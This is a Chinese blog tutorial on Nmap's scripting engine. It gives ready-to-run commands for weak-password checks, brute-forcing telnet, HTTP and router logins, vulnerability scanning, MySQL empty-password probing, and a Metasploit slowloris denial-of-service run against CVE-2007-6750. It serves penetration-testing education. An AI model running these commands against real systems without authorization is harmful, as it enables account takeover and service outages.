前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Nmap脚本使用指南

Nmap脚本使用指南

作者头像
逍遥子大表哥
发布2022-04-02 14:50:46
1.3K0
发布2022-04-02 14:50:46
举报
文章被收录于专栏:kali blogkali blog

关于Nmap的教程,在前面的文章中写到过很多次了。通常情况下,我们是直接用Nmap扫描端口,然后再通过msf nessus进行漏洞扫描利用。所以整个过程比较繁琐,那么我们就要有必要认识一下Nmap的扩展脚本了!

nmap --script

Nmap的脚本位置:/usr/share/nmap/scripts/

查看脚本的数量

代码语言:javascript
复制
ls /usr/share/nmap/scripts/ | wc -l

可以看到,目前有605个,当然这些插件我们可以自己编写,也可以去下载。总之很方便的。

nmap脚本主要分为以下几类,在扫描时可根据需要设置-–script=类别这种方式进行比较笼统的扫描:

脚本名

说明

auth

绕开鉴权 检测是否存在弱口令

broadcast

局域网内探查更多服务开启状况

brute

暴力破解方式,针对常见的应用如http/snmp等

default

使用-sC或-A选项扫描时候默认的脚本

dos

用于进行拒绝服务攻击

exploit

利用已知的漏洞

vuln

负责检查目标机是否有常见的漏洞

常用示例

检查弱口令
代码语言:javascript
复制
nmap --script=auth 192.168.123.1
暴力破解

可对mysql http smtp等常见协议进行暴力破解。

代码语言:javascript
复制
nmap --script=brute 192.168.123.1

如下,我们通过暴力破解,得到了telent的登录密码为admin

尝试登录

默认脚本扫描

默认的脚本扫描,主要是搜集各种应用服务的信息,收集到后,可再针对具体服务进行攻击。

代码语言:javascript
复制
nmap --script=default 192.168.123.1
或者 
nmap -sC 192.168.123.1
检查是否存在常见漏洞
代码语言:javascript
复制
nmap --script=vuln  192.168.123.1

扫描得到,目标可能存在CVE:CVE-2007-6750漏洞

漏洞利用

在msf中搜索此漏洞,配置相关信息即可!

代码语言:javascript
复制
search CVE-2007-6750
use auxiliary/dos/http/slowloris
show options
set rhost 192.168.123.1
run
whois解析

我们对论坛地址bbskali.cn进行历史解析查询。

代码语言:javascript
复制
nmap --script external bbskali.cn

如下我们得到了很多有用的信息:

HTTP认证爆破
代码语言:javascript
复制
nmap --script=http-brute 192.168.123.1

同样,我们这里以路由器的登录密码为破解对象,破解得到账号和密码为admin

注意:Nmap默认字典位置为:/usr/share/nmap/nselib/data

网站目录扫描

类似于御剑那样,nmap也同样可对网站目录进行扫描。

代码语言:javascript
复制
nmap --script=http-ls bbskali.cn
mysql相关
代码语言:javascript
复制
#破解root密码
nmap -p3306 --script=mysql-empty-password.nse 192.168.123.129 
#列出mysql用户
nmap -p3306 --script=mysql-users.nse --script-args=mysqluser=root 192.168.123.129

版权属于:逍遥子大表哥

本文链接:https://cloud.tencent.com/developer/article/1971633

按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • nmap --script
  • 常用示例
    • 检查弱口令
      • 暴力破解
        • 默认脚本扫描
          • 检查是否存在常见漏洞
            • 漏洞利用
              • whois解析
                • HTTP认证爆破
                  • 网站目录扫描
                    • mysql相关
                    相关产品与服务
                    云数据库 SQL Server
                    腾讯云数据库 SQL Server (TencentDB for SQL Server)是业界最常用的商用数据库之一,对基于 Windows 架构的应用程序具有完美的支持。TencentDB for SQL Server 拥有微软正版授权,可持续为用户提供最新的功能,避免未授权使用软件的风险。具有即开即用、稳定可靠、安全运行、弹性扩缩等特点。
                    领券
                    问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档